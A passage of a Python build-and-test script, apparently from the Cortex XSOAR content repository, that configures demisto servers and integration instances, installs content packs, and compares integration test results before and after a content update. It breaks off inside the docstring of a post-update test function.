parser.add_argument('--id_set_path', help='Path to the ID set.')
parser.add_argument('-l', '--tests_to_run', help='Path to the Test Filter.',
default='./Tests/filter_file.txt')
parser.add_argument('-pl', '--pack_ids_to_install', help='Path to the packs to install file.',
default='./Tests/content_packs_to_install.txt')
# disable-secrets-detection-start
parser.add_argument('-sa', '--service_account',
help=("Path to gcloud service account, is for circleCI usage. "
"For local development use your personal account and "
"authenticate using Google Cloud SDK by running: "
"`gcloud auth application-default login` and leave this parameter blank. "
"For more information go to: "
"https://googleapis.dev/python/google-api-core/latest/auth.html"),
required=False)
# disable-secrets-detection-end
options = parser.parse_args()
return options
def check_test_version_compatible_with_server(test, server_version):
"""
Checks if a given test is compatible wis the given server version.
Arguments:
test: (dict)
Test playbook object from content conf.json. May contain the following fields: "playbookID",
"integrations", "instance_names", "timeout", "nightly", "fromversion", "toversion.
server_version: (int)
The server numerical version.
Returns:
(bool) True if test is compatible with server version or False otherwise.
"""
test_from_version = format_version(test.get('fromversion', '0.0.0'))
test_to_version = format_version(test.get('toversion', '99.99.99'))
server_version = format_version(server_version)
if not (LooseVersion(test_from_version) <= LooseVersion(server_version) <= LooseVersion(test_to_version)):
playbook_id = test.get('playbookID')
logging.debug(
f'Test Playbook: {playbook_id} was ignored in the content installation test due to version mismatch '
f'(test versions: {test_from_version}-{test_to_version}, server version: {server_version})')
return False
return True
def filter_tests_with_incompatible_version(tests, server_version):
"""
Filter all tests with incompatible version to the given server.
Arguments:
tests: (list)
List of test objects.
server_version: (int)
The server numerical version.
Returns:
(lst): List of filtered tests (compatible version)
"""
filtered_tests = [test for test in tests if
check_test_version_compatible_with_server(test, server_version)]
return filtered_tests
def configure_integration_instance(integration, client, placeholders_map):
"""
Configure an instance for an integration
Arguments:
integration: (dict)
Integration object whose params key-values are set
client: (demisto_client)
The client to connect to
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
Returns:
(dict): Configured integration instance
"""
integration_name = integration.get('name')
logging.info(f'Configuring instance for integration "{integration_name}"')
integration_instance_name = integration.get('instance_name', '')
integration_params = change_placeholders_to_values(placeholders_map, integration.get('params'))
is_byoi = integration.get('byoi', True)
validate_test = integration.get('validate_test', True)
integration_configuration = __get_integration_config(client, integration_name)
if not integration_configuration:
return None
# In the integration configuration in content-test-conf conf.json, the test_validate flag was set to false
if not validate_test:
logging.debug(f'Skipping configuration for integration: {integration_name} (it has test_validate set to false)')
return None
module_instance = set_integration_instance_parameters(integration_configuration, integration_params,
integration_instance_name, is_byoi, client)
return module_instance
def filepath_to_integration_name(integration_file_path):
"""Load an integration file and return the integration name.
Args:
integration_file_path (str): The path to an integration yml file.
Returns:
(str): The name of the integration.
"""
integration_yaml = get_yaml(integration_file_path)
integration_name = integration_yaml.get('name')
return integration_name
def get_integration_names_from_files(integration_files_list):
integration_names_list = [filepath_to_integration_name(path) for path in integration_files_list]
return [name for name in integration_names_list if name] # remove empty values
def get_new_and_modified_integration_files(branch_name):
"""Return 2 lists - list of new integrations and list of modified integrations since the first commit of the branch.
Args:
branch_name: The branch name against which we will run the 'git diff' command.
Returns:
(tuple): Returns a tuple of two lists, the file paths of the new integrations and modified integrations.
"""
# get changed yaml files (filter only added and modified files)
file_validator = ValidateManager()
file_validator.branch_name = branch_name
modified_files, added_files, _, _ = file_validator.get_changed_files_from_git()
new_integration_files = [
file_path for file_path in added_files if
find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
modified_integration_files = [
file_path for file_path in modified_files if
isinstance(file_path, str) and find_type(file_path) in [FileType.INTEGRATION, FileType.BETA_INTEGRATION]
]
return new_integration_files, modified_integration_files
def is_content_update_in_progress(client):
"""Make request to check if content is updating.
Args:
client (demisto_client): The configured client to use.
Returns:
(str): Returns the request response data which is 'true' if updating and 'false' if not.
"""
host = client.api_client.configuration.host
logging.debug(f'Making "Get" request to server - "{host}" to check if content is installing.')
# make request to check if content is updating
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/content/updating',
method='GET', accept='application/json')
if status_code >= 300 or status_code < 200:
result_object = ast.literal_eval(response_data)
message = result_object.get('message', '')
logging.error(f"Failed to check if content is installing - with status code {status_code}\n{message}")
return 'request unsuccessful'
return response_data
def get_content_version_details(client, ami_name):
"""Make request for details about the content installed on the demisto instance.
Args:
client (demisto_client): The configured client to use.
ami_name (string): the role name of the machine
Returns:
(tuple): The release version and asset ID of the content installed on the demisto instance.
"""
host = client.api_client.configuration.host
logging.info(f'Making "POST" request to server - "{host}" to check installed content.')
# make request to installed content details
uri = '/content/installedlegacy' if ami_name in MARKET_PLACE_MACHINES else '/content/installed'
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path=uri,
method='POST')
try:
result_object = ast.literal_eval(response_data)
logging.debug(f'Response was {response_data}')
except ValueError:
logging.exception('failed to parse response from demisto.')
return '', 0
if status_code >= 300 or status_code < 200:
message = result_object.get('message', '')
logging.error(f'Failed to check if installed content details - with status code {status_code}\n{message}')
return result_object.get('release', ''), result_object.get('assetId', 0)
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, str(value))
return json.loads(item_as_string)
def set_integration_params(build,
integrations,
secret_params,
instance_names,
placeholders_map,
logging_module=logging):
"""
For each integration object, fill in the parameter values needed to configure an instance from
the secret_params taken from our secret configuration file. Because there may be a number of
configurations for a single integration (if there are values provided in our secret conf for
multiple different instances of the same integration) then selects the parameter values for the
configuration of the instance whose instance is in 'instance_names' (will take the last one listed
in 'secret_params'). Note that this function does not explicitly return the modified 'integrations'
object but rather it modifies the 'integrations' object since it is passed by reference and not by
value, so the 'integrations' object that was passed to this function will have been changed once
this function has completed execution and gone out of scope.
Arguments:
build: Build object
integrations: (list of dicts)
List of integration objects whose 'params' attribute will be populated in this function.
secret_params: (list of dicts)
List of secret configuration values for all of our integrations (as well as specific
instances of said integrations).
instance_names: (list)
The names of particular instances of an integration to use the secret_params of as the
configuration values.
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
logging_module (Union[ParallelLoggingManager,logging]): The logging module to use
Returns:
(bool): True if integrations params were filled with secret configuration values, otherwise false
"""
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
# if there are more than one integration params, it means that there are configuration
# values in our secret conf for multiple instances of the given integration and now we
# need to match the configuration values to the proper instance as specified in the
# 'instance_names' list argument
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
failed_match_instance_msg = 'There are {} instances of {}, please select one of them by using' \
' the instance_name argument in conf.json. The options are:\n{}'
logging_module.error(failed_match_instance_msg.format(len(integration_params),
integration['name'],
'\n'.join(optional_instance_names)))
return False
integration['params'] = matched_integration_params.get('params', {})
integration['byoi'] = matched_integration_params.get('byoi', True)
integration['instance_name'] = matched_integration_params.get('instance_name', integration['name'])
integration['validate_test'] = matched_integration_params.get('validate_test', True)
if integration['name'] not in build.unmockable_integrations:
integration['params'].update({'proxy': True})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=True')
else:
integration['params'].update({'proxy': False})
logging.debug(
f'Configuring integration "{integration["name"]}" with proxy=False')
return True
def set_module_params(param_conf, integration_params):
"""Configure a parameter object for use in a module instance.
Each integration parameter is actually an object with many fields that together describe it. E.g. a given
parameter will have all of the following fields - "name", "display", "value", "hasvalue", "defaultValue",
etc. This function fills the "value" field for a parameter configuration object and returns it for use in
a module instance.
Args:
param_conf (dict): The parameter configuration object.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
Returns:
(dict): The configured parameter object
"""
if param_conf['display'] in integration_params or param_conf['name'] in integration_params:
# param defined in conf
key = param_conf['display'] if param_conf['display'] in integration_params else param_conf['name']
if key == 'credentials':
credentials = integration_params[key]
param_value = {
'credential': '',
'identifier': credentials['identifier'],
'password': credentials['password'],
'passwordChanged': False
}
else:
param_value = integration_params[key]
param_conf['value'] = param_value
param_conf['hasvalue'] = True
elif param_conf['defaultValue']:
# if the parameter doesn't have a value provided in the integration's configuration values
# but does have a default value then assign it to the parameter for the module instance
param_conf['value'] = param_conf['defaultValue']
return param_conf
def __set_server_keys(client, integration_params, integration_name):
"""Adds server configuration keys using the demisto_client.
Args:
client (demisto_client): The configured client to use.
integration_params (dict): The values to use for an integration's parameters to configure an instance.
integration_name (str): The name of the integration which the server configurations keys are related to.
"""
if 'server_keys' not in integration_params:
return
logging.info(f'Setting server keys for integration: {integration_name}')
data = {
'data': {},
'version': -1
}
for key, value in integration_params.get('server_keys').items():
data['data'][key] = value
response_data, status_code, _ = demisto_client.generic_request_func(self=client, path='/system/config',
method='POST', body=data)
try:
result_object = ast.literal_eval(response_data)
except ValueError:
logging.exception(f'failed to parse response from demisto. response is {response_data}')
return
if status_code >= 300 or status_code < 200:
message = result_object.get('message', '')
logging.error(f'Failed to set server keys, status_code: {status_code}, message: {message}')
def set_integration_instance_parameters(integration_configuration,
integration_params,
integration_instance_name,
is_byoi,
client):
"""Set integration module values for integration instance creation
The integration_configuration and integration_params should match, in that
they are for the same integration
Arguments:
integration_configuration: (dict)
dictionary of the integration configuration parameters/keys that need
filling to instantiate an instance of a given integration
integration_params: (dict)
values for a given integration taken from the configuration file in
which the secret values are stored to configure instances of various
integrations
integration_instance_name: (str)
The name of the integration instance being configured if there is one
provided in the conf.json
is_byoi: (bool)
If the integration is byoi or not
client: (demisto_client)
The client to connect to
Returns:
(dict): The configured module instance to send to the Demisto server for
instantiation.
"""
module_configuration = integration_configuration.get('configuration', {})
if not module_configuration:
module_configuration = []
if 'integrationInstanceName' in integration_params:
instance_name = integration_params['integrationInstanceName']
else:
instance_name = '{}_test_{}'.format(integration_instance_name.replace(' ', '_'), str(uuid.uuid4()))
# define module instance
module_instance = {
'brand': integration_configuration['name'],
'category': integration_configuration['category'],
'configuration': integration_configuration,
'data': [],
'enabled': "true",
'engine': '',
'id': '',
'isIntegrationScript': is_byoi,
'name': instance_name,
'passwordProtected': False,
'version': 0
}
# set server keys
__set_server_keys(client, integration_params, integration_configuration['name'])
# set module params
for param_conf in module_configuration:
configured_param = set_module_params(param_conf, integration_params)
module_instance['data'].append(configured_param)
return module_instance
def group_integrations(integrations, skipped_integrations_conf, new_integrations_names, modified_integrations_names):
"""
Filter integrations into their respective lists - new, modified or unchanged. if it's on the skip list, then
skip if random tests were chosen then we may be configuring integrations that are neither new or modified.
Args:
integrations (list): The integrations to categorize.
skipped_integrations_conf (dict): Integrations that are on the skip list.
new_integrations_names (list): The names of new integrations.
modified_integrations_names (list): The names of modified integrations.
Returns:
(tuple): Lists of integrations objects as well as an Integration-to-Status dictionary useful for logs.
"""
new_integrations = []
modified_integrations = []
unchanged_integrations = []
integration_to_status = {}
for integration in integrations:
integration_name = integration.get('name', '')
if integration_name in skipped_integrations_conf.keys():
continue
if integration_name in new_integrations_names:
new_integrations.append(integration)
elif integration_name in modified_integrations_names:
modified_integrations.append(integration)
integration_to_status[integration_name] = 'Modified Integration'
else:
unchanged_integrations.append(integration)
integration_to_status[integration_name] = 'Unchanged Integration'
return new_integrations, modified_integrations, unchanged_integrations, integration_to_status
def get_integrations_for_test(test, skipped_integrations_conf):
"""Return a list of integration objects that are necessary for a test (excluding integrations on the skip list).
Args:
test (dict): Test dictionary from the conf.json file containing the playbookID, integrations and
instance names.
skipped_integrations_conf (dict): Skipped integrations dictionary with integration names as keys and
the skip reason as values.
Returns:
(list): List of integration objects to configure.
"""
integrations_conf = test.get('integrations', [])
if not isinstance(integrations_conf, list):
integrations_conf = [integrations_conf]
integrations = [
{'name': integration, 'params': {}} for
integration in integrations_conf if integration not in skipped_integrations_conf
]
return integrations
def update_content_on_demisto_instance(client, server, ami_name):
"""Try to update the content
Args:
client (demisto_client): The configured client to use.
server (str): The server url to pass to Tests/update_content_data.py
"""
content_zip_path = 'artifacts/all_content.zip'
update_content(content_zip_path, server=server, client=client)
# Check if content update has finished installing
sleep_interval = 20
updating_content = is_content_update_in_progress(client)
while updating_content.lower() == 'true':
sleep(sleep_interval)
updating_content = is_content_update_in_progress(client)
if updating_content.lower() == 'request unsuccessful':
# since the request to check if content update installation finished didn't work, can't use that mechanism
# to check and just try sleeping for 30 seconds instead to allow for content update installation to complete
logging.debug('Request to install content was unsuccessful, sleeping for 30 seconds and retrying')
sleep(30)
else:
# check that the content installation updated
# verify the asset id matches the circleci build number / asset_id in the content-descriptor.json
release, asset_id = get_content_version_details(client, ami_name)
with open('content-descriptor.json', 'r') as cd_file:
cd_json = json.loads(cd_file.read())
cd_release = cd_json.get('release')
cd_asset_id = cd_json.get('assetId')
if release == cd_release and asset_id == cd_asset_id:
logging.success(f'Content Update Successfully Installed on server {server}.')
else:
logging.error(
f'Content Update to version: {release} was Unsuccessful:\nAttempted to install content with release '
f'"{cd_release}" and assetId "{cd_asset_id}" but release "{release}" and assetId "{asset_id}" '
f'were retrieved from the instance post installation.')
if ami_name not in MARKET_PLACE_MACHINES:
os._exit(1)
def report_tests_status(preupdate_fails, postupdate_fails, preupdate_success, postupdate_success,
new_integrations_names):
"""Prints errors and/or warnings if there are any and returns whether whether testing was successful or not.
Args:
preupdate_fails (set): List of tuples of integrations that failed the "Test" button prior to content
being updated on the demisto instance where each tuple is comprised of the integration name and the
name of the instance that was configured for that integration which failed.
postupdate_fails (set): List of tuples of integrations that failed the "Test" button after content was
updated on the demisto instance where each tuple is comprised of the integration name and the name
of the instance that was configured for that integration which failed.
preupdate_success (set): List of tuples of integrations that succeeded the "Test" button prior to content
being updated on the demisto instance where each tuple is comprised of the integration name and the
name of the instance that was configured for that integration which failed.
postupdate_success (set): List of tuples of integrations that succeeded the "Test" button after content was
updated on the demisto instance where each tuple is comprised of the integration name and the name
of the instance that was configured for that integration which failed.
new_integrations_names (list): List of the names of integrations that are new since the last official
content release and that will only be present on the demisto instance after the content update is
performed.
Returns:
(bool): False if there were integration instances that succeeded prior to the content update and then
failed after content was updated, otherwise True.
"""
testing_status = True
# a "Test" can be either successful both before and after content update(succeeded_pre_and_post variable),
# fail on one of them(mismatched_statuses variable), or on both(failed_pre_and_post variable)
succeeded_pre_and_post = preupdate_success.intersection(postupdate_success)
if succeeded_pre_and_post:
succeeded_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in succeeded_pre_and_post])
logging.success(
'Integration instances that had ("Test" Button) succeeded both before and after the content update:\n'
f'{succeeded_pre_and_post_string}')
failed_pre_and_post = preupdate_fails.intersection(postupdate_fails)
mismatched_statuses = postupdate_fails - preupdate_fails
failed_only_after_update = []
failed_but_is_new = []
for instance_name, integration_of_instance in mismatched_statuses:
if integration_of_instance in new_integrations_names:
failed_but_is_new.append((instance_name, integration_of_instance))
else:
failed_only_after_update.append((instance_name, integration_of_instance))
# warnings but won't fail the build step
if failed_but_is_new:
failed_but_is_new_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_but_is_new])
logging.warning(f'New Integrations ("Test" Button) Failures:\n{failed_but_is_new_string}')
if failed_pre_and_post:
failed_pre_and_post_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"'
for instance_name, integration_of_instance in failed_pre_and_post])
logging.warning(f'Integration instances that had ("Test" Button) failures '
f'both before and after the content update:\n{pformat(failed_pre_and_post_string)}')
# fail the step if there are instances that only failed after content was updated
if failed_only_after_update:
failed_only_after_update_string = "\n".join(
[f'Integration: "{integration_of_instance}", Instance: "{instance_name}"' for
instance_name, integration_of_instance in failed_only_after_update])
testing_status = False
logging.critical('Integration instances that had ("Test" Button) failures only after content was updated:\n'
f'{pformat(failed_only_after_update_string)}.\n'
f'This indicates that your updates introduced breaking changes to the integration.')
return testing_status
def get_env_conf():
if Build.run_environment == Running.CIRCLECI_RUN:
return get_json_file(Build.env_results_path)
elif Build.run_environment == Running.WITH_LOCAL_SERVER:
# START CHANGE ON LOCAL RUN #
return [{
"InstanceDNS": "http://localhost:8080",
"Role": "Server Master" # e.g. 'Server Master'
}]
elif Build.run_environment == Running.WITH_OTHER_SERVER:
return [{
"InstanceDNS": "DNS NANE", # without http prefix
"Role": "DEMISTO EVN" # e.g. 'Server Master'
}]
# END CHANGE ON LOCAL RUN #
def map_server_to_port(env_results, instance_role):
"""
Arguments:
env_results: (dict)
env_results.json in server
instance_role: (str)
The amazon machine image environment whose IP we should connect to.
Returns:
(lst): The server url list to connect to
"""
ip_to_port_map = {env.get('InstanceDNS'): env.get('TunnelPort') for env in env_results if
instance_role in env.get('Role', '')}
return ip_to_port_map
def get_json_file(path):
with open(path, 'r') as json_file:
return json.loads(json_file.read())
def configure_servers_and_restart(build):
manual_restart = Build.run_environment == Running.WITH_LOCAL_SERVER
for server in build.servers:
configurations = dict()
configure_types = []
if LooseVersion(build.server_numeric_version) <= LooseVersion('5.5.0'):
configure_types.append('ignore docker image validation')
configurations.update(AVOID_DOCKER_IMAGE_VALIDATION)
configurations.update(NO_PROXY_CONFIG)
if LooseVersion(build.server_numeric_version) >= LooseVersion('5.5.0'):
if is_redhat_instance(server.internal_ip):
configurations.update(DOCKER_HARDENING_CONFIGURATION_FOR_PODMAN)
configurations.update(NO_PROXY_CONFIG)
else:
configurations.update(DOCKER_HARDENING_CONFIGURATION)
configure_types.append('docker hardening')
if LooseVersion(build.server_numeric_version) >= LooseVersion('6.0.0'):
configure_types.append('marketplace')
configurations.update(MARKET_PLACE_CONFIGURATION)
error_msg = 'failed to set {} configurations'.format(' and '.join(configure_types))
server.add_server_configuration(configurations, error_msg=error_msg, restart=not manual_restart)
if manual_restart:
input('restart your server and then press enter.')
else:
logging.info('Done restarting servers. Sleeping for 1 minute')
sleep(60)
def get_tests(build: Build) -> List[str]:
"""
Selects the tests from that should be run in this execution and filters those that cannot run in this server version
Args:
build: Build object
Returns:
Test configurations from conf.json that should be run in this execution
"""
server_numeric_version: str = build.server_numeric_version
tests: dict = build.tests
if Build.run_environment == Running.CIRCLECI_RUN:
filtered_tests = extract_filtered_tests()
if build.is_nightly:
# skip test button testing
logging.debug('Not running instance tests in nightly flow')
tests_for_iteration = []
elif filtered_tests:
tests_for_iteration = [test for test in tests if test.get('playbookID', '') in filtered_tests]
else:
tests_for_iteration = tests
tests_for_iteration = filter_tests_with_incompatible_version(tests_for_iteration, server_numeric_version)
return tests_for_iteration
else:
# START CHANGE ON LOCAL RUN #
return [
{
"playbookID": "Docker Hardening Test",
"fromversion": "5.0.0"
},
{
"integrations": "SplunkPy",
"playbookID": "SplunkPy-Test-V2",
"memory_threshold": 500,
"instance_names": "use_default_handler"
}
]
# END CHANGE ON LOCAL RUN #
def get_changed_integrations(build: Build) -> tuple:
"""
Return 2 lists - list of new integrations and list of modified integrations since the commit of the git_sha1.
Args:
build: the build object
Returns:
list of new integrations and list of modified integrations
"""
new_integrations_files, modified_integrations_files = get_new_and_modified_integration_files(
build.branch_name) if not build.is_private else ([], [])
new_integrations_names, modified_integrations_names = [], []
if new_integrations_files:
new_integrations_names = get_integration_names_from_files(new_integrations_files)
logging.debug(f'New Integrations Since Last Release:\n{new_integrations_names}')
if modified_integrations_files:
modified_integrations_names = get_integration_names_from_files(modified_integrations_files)
logging.debug(f'Updated Integrations Since Last Release:\n{modified_integrations_names}')
return new_integrations_names, modified_integrations_names
def get_pack_ids_to_install():
if Build.run_environment == Running.CIRCLECI_RUN:
with open('./Tests/content_packs_to_install.txt', 'r') as packs_stream:
pack_ids = packs_stream.readlines()
return [pack_id.rstrip('\n') for pack_id in pack_ids]
else:
# START CHANGE ON LOCAL RUN #
return [
'SplunkPy'
]
# END CHANGE ON LOCAL RUN #
def nightly_install_packs(build, install_method=install_all_content_packs, pack_path=None, service_account=None):
threads_list = []
# For each server url we install pack/ packs
for thread_index, server in enumerate(build.servers):
kwargs = {'client': server.client, 'host': server.internal_ip}
if service_account:
kwargs['service_account'] = service_account
if pack_path:
kwargs['pack_path'] = pack_path
threads_list.append(Thread(target=install_method, kwargs=kwargs))
run_threads_list(threads_list)
def install_nightly_pack(build):
nightly_install_packs(build, install_method=install_all_content_packs_for_nightly,
service_account=build.service_account)
create_nightly_test_pack()
nightly_install_packs(build, install_method=upload_zipped_packs,
pack_path=f'{Build.test_pack_target}/test_pack.zip')
logging.info('Sleeping for 45 seconds while installing nightly packs')
sleep(45)
def install_packs(build, pack_ids=None):
pack_ids = get_pack_ids_to_install() if pack_ids is None else pack_ids
installed_content_packs_successfully = True
for server in build.servers:
try:
_, flag = search_and_install_packs_and_their_dependencies(pack_ids, server.client)
if not flag:
raise Exception('Failed to search and install packs.')
except Exception:
logging.exception('Failed to search and install packs')
installed_content_packs_successfully = False
return installed_content_packs_successfully
def configure_server_instances(build: Build, tests_for_iteration, all_new_integrations, modified_integrations):
modified_module_instances = []
new_module_instances = []
testing_client = build.servers[0].client
for test in tests_for_iteration:
integrations = get_integrations_for_test(test, build.skipped_integrations_conf)
playbook_id = test.get('playbookID')
new_integrations, modified_integrations, unchanged_integrations, integration_to_status = group_integrations(
integrations, build.skipped_integrations_conf, all_new_integrations, modified_integrations
)
integration_to_status_string = '\n\t\t\t\t\t\t'.join(
[f'"{key}" - {val}' for key, val in integration_to_status.items()])
if integration_to_status_string:
logging.info(f'All Integrations for test "{playbook_id}":\n\t\t\t\t\t\t{integration_to_status_string}')
else:
logging.info(f'No Integrations for test "{playbook_id}"')
instance_names_conf = test.get('instance_names', [])
if not isinstance(instance_names_conf, list):
instance_names_conf = [instance_names_conf]
integrations_to_configure = modified_integrations[:]
integrations_to_configure.extend(unchanged_integrations)
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
new_ints_params_set = set_integration_params(build,
new_integrations,
build.secret_conf['integrations'],
instance_names_conf,
placeholders_map)
ints_to_configure_params_set = set_integration_params(build,
integrations_to_configure,
build.secret_conf['integrations'],
instance_names_conf, placeholders_map)
if not new_ints_params_set:
logging.error(f'failed setting parameters for integrations: {new_integrations}')
if not ints_to_configure_params_set:
logging.error(f'failed setting parameters for integrations: {integrations_to_configure}')
if not (new_ints_params_set and ints_to_configure_params_set):
continue
modified_module_instances_for_test, new_module_instances_for_test = configure_modified_and_new_integrations(
build,
integrations_to_configure,
new_integrations,
testing_client)
modified_module_instances.extend(modified_module_instances_for_test)
new_module_instances.extend(new_module_instances_for_test)
return modified_module_instances, new_module_instances
def configure_modified_and_new_integrations(build: Build,
modified_integrations_to_configure: list,
new_integrations_to_configure: list,
demisto_client: demisto_client) -> tuple:
"""
Configures old and new integrations in the server configured in the demisto_client.
Args:
build: The build object
modified_integrations_to_configure: Integrations to configure that are already exists
new_integrations_to_configure: Integrations to configure that were created in this build
demisto_client: A demisto client
Returns:
A tuple with two lists:
1. List of configured instances of modified integrations
2. List of configured instances of new integrations
"""
modified_modules_instances = []
new_modules_instances = []
for integration in modified_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client, placeholders_map)
if module_instance:
modified_modules_instances.append(module_instance)
for integration in new_integrations_to_configure:
placeholders_map = {'%%SERVER_HOST%%': build.servers[0]}
module_instance = configure_integration_instance(integration, demisto_client, placeholders_map)
if module_instance:
new_modules_instances.append(module_instance)
return modified_modules_instances, new_modules_instances
def instance_testing(build: Build,
all_module_instances: list,
pre_update: bool,
use_mock: bool = True) -> Tuple[set, set]:
"""
Runs 'test-module' command for the instances detailed in `all_module_instances`
Args:
build: An object containing the current build info.
all_module_instances: The integration instances that should be tested
pre_update: Whether this instance testing is before or after the content update on the server.
use_mock: Whether to use mock while testing mockable integrations. Should be used mainly with
private content build which aren't using the mocks.
Returns:
A set of the successful tests containing the instance name and the integration name
A set of the failed tests containing the instance name and the integration name
"""
update_status = 'Pre' if pre_update else 'Post'
failed_tests = set()
successful_tests = set()
# Test all module instances (of modified + unchanged integrations) pre-updating content
if all_module_instances:
# only print start message if there are instances to configure
logging.info(f'Start of Instance Testing ("Test" button) ({update_status}-update)')
else:
logging.info(f'No integrations to configure for the chosen tests. ({update_status}-update)')
for instance in all_module_instances:
integration_of_instance = instance.get('brand', '')
instance_name = instance.get('name', '')
# If there is a failure, __test_integration_instance will print it
if integration_of_instance not in build.unmockable_integrations and use_mock:
success = test_integration_with_mock(build, instance, pre_update)
else:
testing_client = build.servers[0].reconnect_client()
success, _ = __test_integration_instance(testing_client, instance)
if not success:
failed_tests.add((instance_name, integration_of_instance))
else:
successful_tests.add((instance_name, integration_of_instance))
return successful_tests, failed_tests
def test_integration_with_mock(build: Build, instance: dict, pre_update: bool):
"""
Runs 'test-module' for given integration with mitmproxy
In case the playback mode fails and this is a pre-update run - a record attempt will be executed.
Args:
build: An object containing the current build info.
instance: A dict containing the instance details
pre_update: Whether this instance testing is before or after the content update on the server.
Returns:
The result of running the 'test-module' command for the given integration.
If a record was executed - will return the result of the 'test--module' with the record mode only.
"""
testing_client = build.servers[0].reconnect_client()
integration_of_instance = instance.get('brand', '')
logging.debug(f'Integration "{integration_of_instance}" is mockable, running test-module with mitmproxy')
has_mock_file = build.proxy.has_mock_file(integration_of_instance)
success = False
if has_mock_file:
with run_with_mock(build.proxy, integration_of_instance) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.warning(f'Running test-module for "{integration_of_instance}" has failed in playback mode')
if not success and not pre_update:
logging.debug(f'Recording a mock file for integration "{integration_of_instance}".')
with run_with_mock(build.proxy, integration_of_instance, record=True) as result_holder:
success, _ = __test_integration_instance(testing_client, instance)
result_holder[RESULT] = success
if not success:
logging.debug(f'Record mode for integration "{integration_of_instance}" has failed.')
return success
def update_content_till_v6(build: Build):
threads_list = []
# For each server url we install content
for thread_index, server in enumerate(build.servers):
t = Thread(target=update_content_on_demisto_instance,
kwargs={'client': server.client, 'server': server.internal_ip, 'ami_name': build.ami_env})
threads_list.append(t)
run_threads_list(threads_list)
def disable_instances(build: Build):
for server in build.servers:
disable_all_integrations(server.client)
def create_nightly_test_pack():
test_pack_zip(Build.content_path, Build.test_pack_target)
def test_files(content_path):
packs_root = f'{content_path}/Packs'
packs = filter(lambda x: x.is_dir(), os.scandir(packs_root))
for pack_dir in packs:
if pack_dir in SKIPPED_PACKS:
continue
playbooks_root = f'{pack_dir.path}/TestPlaybooks'
if os.path.isdir(playbooks_root):
for playbook_path, playbook in get_test_playbooks_in_dir(playbooks_root):
yield playbook_path, playbook
if os.path.isdir(f'{playbooks_root}/NonCircleTests'):
for playbook_path, playbook in get_test_playbooks_in_dir(f'{playbooks_root}/NonCircleTests'):
yield playbook_path, playbook
def get_test_playbooks_in_dir(path):
playbooks = filter(lambda x: x.is_file(), os.scandir(path))
for playbook in playbooks:
yield playbook.path, playbook
def test_pack_metadata():
now = datetime.now().isoformat().split('.')[0]
now = f'{now}Z'
metadata = {
"name": "nightly test",
"id": str(uuid.uuid4()),
"description": "nightly test pack (all test playbooks and scripts).",
"created": now,
"updated": now,
"legacy": True,
"support": "Cortex XSOAR",
"supportDetails": {},
"author": "Cortex XSOAR",
"authorImage": "",
"certification": "certified",
"price": 0,
"serverMinVersion": "6.0.0",
"serverLicense": "",
"currentVersion": "1.0.0",
"general": [],
"tags": [],
"categories": [
"Forensics & Malware Analysis"
],
"contentItems": {},
"integrations": [],
"useCases": [],
"keywords": [],
"dependencies": {}
}
return json.dumps(metadata, indent=4)
def test_pack_zip(content_path, target):
with zipfile.ZipFile(f'{target}/test_pack.zip', 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr('test_pack/metadata.json', test_pack_metadata())
for test_path, test in test_files(content_path):
if not test_path.endswith('.yml'):
continue
test = test.name
with open(test_path, 'r') as test_file:
if not (test.startswith('playbook-') or test.startswith('script-')):
test_type = find_type(_dict=yaml.safe_load(test_file), file_type='yml').value
test_file.seek(0)
test_target = f'test_pack/TestPlaybooks/{test_type}-{test}'
else:
test_target = f'test_pack/TestPlaybooks/{test}'
zip_file.writestr(test_target, test_file.read())
def get_non_added_packs_ids(build: Build):
"""
:param build: the build object
:return: all non added packs i.e. unchanged packs (dependencies) and modified packs
"""
compare_against = 'origin/master{}'.format('' if not build.branch_name == 'master' else '~1')
added_files = run_command(f'git diff --name-only --diff-filter=A '
f'{compare_against}..refs/heads/{build.branch_name} -- Packs/*/pack_metadata.json')
added_files = filter(lambda x: x, added_files.split('\n'))
added_pack_ids = map(lambda x: x.split('/')[1], added_files)
return set(get_pack_ids_to_install()) - set(added_pack_ids)
def set_marketplace_url(servers, branch_name, ci_build_number):
url_suffix = f'{branch_name}/{ci_build_number}'
config_path = 'marketplace.bootstrap.bypass.url'
config = {config_path: f'https://storage.googleapis.com/marketplace-ci-build/content/builds/{url_suffix}'}
for server in servers:
server.add_server_configuration(config, 'failed to configure marketplace custom url ', True)
logging.success('Updated marketplace url and restarted servers')
logging.info('sleeping for 60 seconds')
sleep(60)
@run_with_proxy_configured
def test_integrations_post_update(build: Build, new_module_instances: list, modified_module_instances: list) -> tuple:
"""
Runs 'test-module on all integrations for post-update check
Args:
build: A build object
new_module_instances: A list containing new integrations instances to run test-module on
modified_module_instances: A list containing old (existing) integrations instances to run test-module on
Returns:
* A list of integration names that have failed the 'test-module' execution post update
* A list of integration names that have succeeded the 'test-module' execution post update
"""
